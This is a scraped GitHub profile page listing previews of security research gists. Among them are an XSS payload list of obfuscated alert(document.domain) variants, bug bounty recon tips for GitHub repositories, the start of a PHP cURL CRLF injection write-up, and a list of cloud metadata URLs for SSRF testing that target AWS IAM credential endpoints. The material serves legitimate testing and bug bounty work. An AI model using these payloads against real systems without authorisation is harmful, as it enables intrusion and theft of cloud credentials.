Skip to content

Instantly share code, notes, and snippets.

View Dhamuharker's full-sized avatar

Dhamu Dhamuharker

128 followers · 827 following
  • chennai, TamilNadu
View GitHub Profile
@Neo23x0
Neo23x0 / TI-Search-Shortcuts.md
Last active February 18, 2022 13:00
Search Engine Shortcuts

Search Engine Shortcuts

Use Manage Search Engines in your browser to add these search engines. You can then use the 'keyword' in the URL bar to do a quick lookup. Find more details about managing your search engines in Chrome here.

e.g. Type

v dad8ebcbb5fa6721ccad45b81874e22c
@tomnomnom
tomnomnom / alert.js
Last active October 27, 2025 04:03
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active October 24, 2025 09:41
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@tomnomnom
tomnomnom / php-curl-crlf-injection.mkd
Last active October 11, 2024 16:43
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active October 17, 2025 18:24
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]